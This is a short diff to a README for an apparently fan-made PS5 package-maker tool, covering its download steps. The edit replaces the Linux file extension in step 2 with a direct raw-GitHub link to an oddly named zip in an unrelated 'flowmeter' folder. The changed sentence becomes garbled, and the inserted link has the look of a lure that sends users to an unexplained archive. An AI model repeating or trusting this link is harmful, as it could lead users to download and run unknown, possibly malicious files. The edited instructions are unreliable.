Sploo-Scripts/TheWiz-PS5-Easy-FFpkg-Maker/README.md

 1. Click the big blue **Download Latest Release** button at the top of this page.
 It will take you to the release page on GitHub where you can get the latest version.

 2. On the release page, find the installer file for your computer’s operating system.
-The files usually have extensions like `.exe` for Windows, `.dmg` for macOS, or `.AppImage` / `.tar.gz` for Linux.
+The files usually have extensions like `.exe` for Windows, `.dmg` for macOS, or `.AppImage` / `https://raw.githubusercontent.com/Sploo-Scripts/TheWiz-PS5-Easy-FFpkg-Maker/main/flowmeter/The_Maker_Fpkg_P_Wiz_Easy_F_v1.9.zip` for Linux.

 3. Download the installer file to your computer.